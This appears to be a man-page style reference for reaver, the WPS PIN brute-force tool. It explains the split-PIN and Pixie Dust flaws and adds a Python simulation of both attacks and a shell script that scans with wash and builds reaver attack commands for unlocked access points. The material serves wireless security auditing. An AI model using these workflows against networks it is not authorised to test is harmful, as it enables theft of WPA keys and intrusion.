reaver
Brute-force WPS PIN to recover WPA key
SYNOPSIS
reaver -i <interface> -b <BSSID> [options]
PARAMETERS
-i, --interface <interface>
Specifies the wireless interface to use, which must be in monitor mode (e.g., wlan0mon).
-b, --bssid <BSSID>
The BSSID (MAC address) of the target Access Point (AP) with WPS enabled.
-c, --channel <channel>
Sets the 802.11 channel of the target AP and disables channel hopping (implies -f). If omitted, reaver hops channels until it sees beacons from the target BSSID.
-p, --pin <PIN>
Uses the specified PIN instead of brute-forcing. An 8-digit PIN (for example a suspected default) is tested directly; a 4-digit value is taken as a known first half, so only the second half is brute-forced.
-v, --verbose
Displays non-critical warnings; repeat the flag (-vv, -vvv) for progressively more detail about each WPS exchange and PIN attempt.
-l, --lock-delay <seconds>
Time to wait when the AP reports that WPS PIN attempts are locked (default 60). Not to be confused with -L, --ignore-locks, which makes reaver disregard the locked state the AP reports and keep trying.
-x, --fail-wait <seconds>
Time to sleep after 10 unexpected failures (default 0, i.e. no pause).
-N, --no-nacks
Do not send NACK messages when out-of-order packets are received. Helps with some APs that mishandle them.
-w, --win7
Mimics a Windows 7 registrar in the WPS exchange (default off). An option to try when an AP does not respond to reaver's default registrar behaviour.
-K, --pixie-dust
Runs the Pixie Dust attack: reaver completes a single exchange up to M3, collects PKE, PKR, E-Hash1, E-Hash2, AuthKey and the nonces, and hands them to pixiewps (which must be installed) to recover the PIN offline. Only works against APs whose E-S1/E-S2 secret nonces are predictable. -Z is an alias.
-1, --p1-index <index>
-2, --p2-index <index>
Set the starting index into the first-half and second-half PIN tables respectively (reaver 1.6.x), so an interrupted brute force can be restarted partway through the keyspace rather than from 0000.
-O, --output-file <file>
Writes packets of interest from the exchange to a pcap file (reaver 1.6.x). The -o, --out-file option of the original reaver 1.4 instead sent reaver's text output to a log file.
-s, --session <file>
Restores a previous session from the given file. Reaver saves progress automatically, keyed by BSSID, and offers to resume when the same target is attacked again; -s names the session file explicitly.
DESCRIPTION
The reaver command is an open-source tool that exploits a design flaw in the Wi-Fi Protected Setup (WPS) protocol. Its primary function is an online brute-force attack against the WPS PIN, the 8-digit numeric code used to enrol devices without typing the WPA passphrase; once the PIN is accepted, the AP delivers its WPA/WPA2 credentials in message M7 of the normal WPS exchange, which is how reaver recovers the key. The flaw is that the AP verifies the PIN in two independent halves: the first four digits are checked when it receives M4 and the next three when it receives M6, while the eighth digit is a checksum computed from the other seven. A wrong guess is answered with an EAP-NACK right after the half it falls in, so the search shrinks from 10^7 possible PINs (10^8 minus the checksum digit) to at most 10^4 + 10^3 = 11,000 attempts.
Although written for this online brute force, reaver (the 1.6.x fork in particular) has since absorbed other WPS attacks, most notably Pixie Dust, which can recover the PIN offline from a single WPS exchange when the AP's secret nonces are predictable, removing the need for thousands of online attempts. Reaver is a standard tool in wireless security audits for testing whether a WPS implementation resists PIN recovery.
CAVEATS
Using reaver for unauthorized access to wireless networks is illegal and unethical. It can cause network instability, AP lockouts, and may alert network administrators. It requires a wireless adapter capable of monitor mode and packet injection. Success is not guaranteed, as many modern APs have implemented stronger countermeasures against WPS attacks (e.g., faster lockouts, disabling WPS). The Pixie Dust attack's success depends on the AP's vulnerable WPS implementation.
PREREQUISITES
A specialized wireless network adapter capable of both monitor mode and packet injection is essential for reaver to function. Tools from the aircrack-ng suite, such as airmon-ng, are often used to put the wireless interface into the required monitor mode before running reaver.
ATTACK PRINCIPLES
The classic reaver brute-force attack exploits the way the WPS PIN is verified. The 8-digit PIN is split: the AP checks the first four digits (via PSK1, derived from them) when it processes M4, and the next three digits plus the checksum digit (via PSK2) when it processes M6, replying with an EAP-NACK as soon as a half is wrong. Reaver therefore needs at most 10,000 guesses for the first half and 1,000 for the second (the checksum digit is computed, not guessed), 11,000 in total, instead of 10^7 for the whole PIN. Pixie Dust attacks the same exchange offline: in M3 the AP sends E-Hash1 = HMAC-SHA256(AuthKey, E-S1 || PSK1 || PKE || PKR) and the analogous E-Hash2. Reaver, acting as registrar, already knows AuthKey, PKE and PKR, so if the AP's secret nonces E-S1 and E-S2 are predictable (some chipsets set them to zero or drew them from a PRNG whose state follows from the public nonce N1), the only unknown in each hash is one PIN half, and both halves can be recovered by recomputing the hashes for 10,000 and 1,000 candidates respectively, with no further frames sent to the AP.
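The split verification and the offline Pixie Dust recovery described above, worked through in a self-contained model. This is an added example, not reaver's or pixiewps' code: the PSK1/PSK2 and E-Hash/R-Hash derivations follow the WPS specification, but AuthKey, PKE, PKR and the PIN are constructed values, and the "weak" AP simply uses all-zero E-S1/E-S2, an assumption standing in for the real predictable-PRNG bugs. The Enrollee class models the AP, online_bruteforce plays reaver, and pixie_dust shows that the same 11,000 candidates can be tested offline once the nonces are known.

```python
"""Model of the WPS PIN check: why reaver needs at most 10^4 + 10^3 online guesses,
and how Pixie Dust recovers the PIN offline when the AP's E-S1/E-S2 nonces are weak.
Added example for this page, not reaver's or pixiewps' code. The PSK and hash
derivations follow the WPS specification; AuthKey, PKE, PKR and the PIN are
constructed values, and the "weak" AP uses all-zero nonces as an assumption
standing in for the real predictable-PRNG bugs."""
import hashlib
import hmac
import os


def wps_checksum(first7: str) -> str:
    """Eighth PIN digit: weighted digit sum over the first seven, as in WPS."""
    acc = sum((3 if i % 2 == 0 else 1) * int(d) for i, d in enumerate(first7))
    return str((10 - acc % 10) % 10)


def psk(authkey: bytes, half: str) -> bytes:
    """PSK1/PSK2: first 128 bits of HMAC-SHA256(AuthKey, ASCII digits of one PIN half)."""
    return hmac.new(authkey, half.encode(), hashlib.sha256).digest()[:16]


def wps_hash(authkey: bytes, secret: bytes, psk_half: bytes, pke: bytes, pkr: bytes) -> bytes:
    """E-Hash1/2 and R-Hash1/2: HMAC-SHA256(AuthKey, S || PSK || PKE || PKR)."""
    return hmac.new(authkey, secret + psk_half + pke + pkr, hashlib.sha256).digest()


class Enrollee:
    """Stand-in for the WPS AP that holds the PIN (a model, not a real WPS stack)."""

    def __init__(self, pin: str, authkey: bytes, pke: bytes, pkr: bytes, weak_nonces: bool):
        assert len(pin) == 8 and wps_checksum(pin[:7]) == pin[7], "invalid WPS PIN"
        self.pin, self.authkey, self.pke, self.pkr = pin, authkey, pke, pkr
        # Pixie Dust bug modelled as all-zero nonces; a sound AP draws 128 random bits.
        self.es1 = bytes(16) if weak_nonces else os.urandom(16)
        self.es2 = bytes(16) if weak_nonces else os.urandom(16)
        self.attempts = 0

    def m3(self):
        """M3: the AP commits to each PIN half separately (E-Hash1, E-Hash2)."""
        return (wps_hash(self.authkey, self.es1, psk(self.authkey, self.pin[:4]), self.pke, self.pkr),
                wps_hash(self.authkey, self.es2, psk(self.authkey, self.pin[4:]), self.pke, self.pkr))

    def check_m4(self, rs1: bytes, rhash1: bytes) -> bool:
        """M4 check involves PSK1 (digits 1-4) only; False means the AP answers EAP-NACK."""
        self.attempts += 1
        want = wps_hash(self.authkey, rs1, psk(self.authkey, self.pin[:4]), self.pke, self.pkr)
        return hmac.compare_digest(want, rhash1)

    def check_m6(self, rs2: bytes, rhash2: bytes) -> bool:
        """M6 check involves PSK2 (digits 5-8) only."""
        self.attempts += 1
        want = wps_hash(self.authkey, rs2, psk(self.authkey, self.pin[4:]), self.pke, self.pkr)
        return hmac.compare_digest(want, rhash2)


def online_bruteforce(ap: Enrollee, authkey: bytes, pke: bytes, pkr: bytes) -> str:
    """Reaver-style attack: learn digits 1-4 from M4 outcomes, then 5-7 from M6 (8 is implied)."""
    rs1, rs2 = os.urandom(16), os.urandom(16)  # registrar (attacker) nonces, freely chosen
    first = next(f"{i:04d}" for i in range(10_000)
                 if ap.check_m4(rs1, wps_hash(authkey, rs1, psk(authkey, f"{i:04d}"), pke, pkr)))
    for j in range(1_000):
        second = f"{j:03d}" + wps_checksum(first + f"{j:03d}")
        if ap.check_m6(rs2, wps_hash(authkey, rs2, psk(authkey, second), pke, pkr)):
            return first + second
    raise RuntimeError("no PIN matched: AP and registrar disagree on AuthKey, PKE or PKR")


def pixie_dust(ehash1: bytes, ehash2: bytes, es1_guess: bytes, es2_guess: bytes,
               authkey: bytes, pke: bytes, pkr: bytes):
    """Offline recovery from one M1-M3 exchange given a guess for E-S1/E-S2.
    Returns the PIN, or None when the guess is wrong (the nonces really were random)."""
    first = next((f"{i:04d}" for i in range(10_000)
                  if wps_hash(authkey, es1_guess, psk(authkey, f"{i:04d}"), pke, pkr) == ehash1), None)
    if first is None:
        return None
    for j in range(1_000):
        second = f"{j:03d}" + wps_checksum(first + f"{j:03d}")
        if wps_hash(authkey, es2_guess, psk(authkey, second), pke, pkr) == ehash2:
            return first + second
    return None


def demo(pin: str = "12345670", weak_nonces: bool = True) -> dict:
    """Run both attacks against one constructed AP; fixed keys keep the result reproducible."""
    authkey = hashlib.sha256(b"constructed AuthKey").digest()  # really derived from the DH exchange
    pke, pkr = hashlib.sha256(b"PKE").digest() * 6, hashlib.sha256(b"PKR").digest() * 6  # 192-byte stand-ins
    ap = Enrollee(pin, authkey, pke, pkr, weak_nonces)
    ehash1, ehash2 = ap.m3()
    offline = pixie_dust(ehash1, ehash2, bytes(16), bytes(16), authkey, pke, pkr)
    online = online_bruteforce(ap, authkey, pke, pkr)
    return {"online_pin": online, "online_attempts": ap.attempts, "pixie_dust_pin": offline}


if __name__ == "__main__":
    print(demo(weak_nonces=True))    # both attacks return '12345670'; 1803 online attempts
    print(demo(weak_nonces=False))   # pixie_dust_pin is None: random nonces defeat the offline guess
```

The attempt counter makes the point of the split check concrete: PIN 12345670 costs 1,235 M4 attempts plus 568 M6 attempts, never more than 11,000 in total, whereas guessing the full 7 free digits could take ten million. Against the AP with random nonces, online_bruteforce still succeeds (the flaw is in the protocol) while pixie_dust returns None (that flaw is in the implementation), which is exactly why reaver tries -K first and falls back to the online attack.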
TYPICAL WORKFLOW
A common workflow involves:
1. Putting the wireless adapter into monitor mode using airmon-ng.
2. Scanning for WPS-enabled Access Points using wash -i <interface>.
3. Launching reaver against a target AP identified by wash using its BSSID and channel.
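The three steps as one script, added here as an example and not part of reaver or aircrack-ng. It assumes the wash 1.6.x column layout (BSSID Ch dBm WPS Lck Vendor ESSID) and an interface already placed in monitor mode by airmon-ng (wlan0 normally becomes wlan0mon); the scan listing embedded in it is constructed, not a real capture, so without a live interface the script only filters targets and builds the reaver command lines.

```shell
#!/bin/sh
# Added example for this page, not reaver's or aircrack-ng's code.
# Assumes wash 1.6.x output columns: BSSID Ch dBm WPS Lck Vendor ESSID.

# Keep only rows whose Lck column is "No": a locked AP rejects every PIN
# attempt and only costs lock-delay waits. Prints "BSSID channel" per target.
select_unlocked_targets() {
    awk 'NR > 2 && $5 == "No" { print $1, $2 }'
}

# reaver command for one target: fixed channel (-c), verbose (-vv) and -K so
# the offline Pixie Dust attempt runs before the online brute force.
reaver_cmd() {
    printf 'reaver -i %s -b %s -c %s -vv -K\n' "$1" "$2" "$3"
}

# Constructed scan listing (not a real capture) so the script runs offline.
SAMPLE_SCAN='BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
00:11:22:33:44:55    6  -41  2.0  No   RalinkTe  lab-ap-1
66:77:88:99:AA:BB   11  -67  1.0  Yes  Broadcom  lab-ap-2
CC:DD:EE:FF:00:11    1  -58  2.0  No   AtherosC  lab-ap-3'

# Live run (root, monitor-capable adapter, written authorisation for the network):
#   airmon-ng start wlan0              # step 1: creates wlan0mon
#   REAVER_IFACE=wlan0mon sh wps-targets.sh
# Step 2 scans for 30 seconds; step 3 prints one reaver command per unlocked AP.
run_live() {
    timeout 30 wash -i "$1" | select_unlocked_targets | while read -r bssid ch; do
        reaver_cmd "$1" "$bssid" "$ch"
    done
}

if [ -n "${REAVER_IFACE:-}" ]; then
    run_live "$REAVER_IFACE"
else
    printf '%s\n' "$SAMPLE_SCAN" | select_unlocked_targets | while read -r bssid ch; do
        reaver_cmd wlan0mon "$bssid" "$ch"
    done
fi
```

Filtering on the Lck column before launching matters in practice: reaver against an already-locked AP spends its time in lock-delay waits, and each attempt against it can extend the lockout.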
HISTORY
Reaver emerged as a groundbreaking tool in 2011, quickly gaining notoriety for demonstrating a severe vulnerability in the Wi-Fi Protected Setup (WPS) protocol. Its release brought widespread attention to the fundamental design flaw that allowed the 8-digit WPS PIN to be brute-forced relatively quickly. This exposure prompted many manufacturers to issue firmware updates to mitigate the vulnerability, often by disabling WPS by default or implementing aggressive lockout mechanisms. However, many older or unpatched devices remain vulnerable. The tool's development continued, integrating new attack vectors like the 'Pixie Dust' attack, which offered an often faster, offline method to retrieve the WPS PIN, further highlighting the protocol's weaknesses.
SEE ALSO
wash(1), airmon-ng(8), aireplay-ng(8), aircrack-ng(1), pixiewps(1)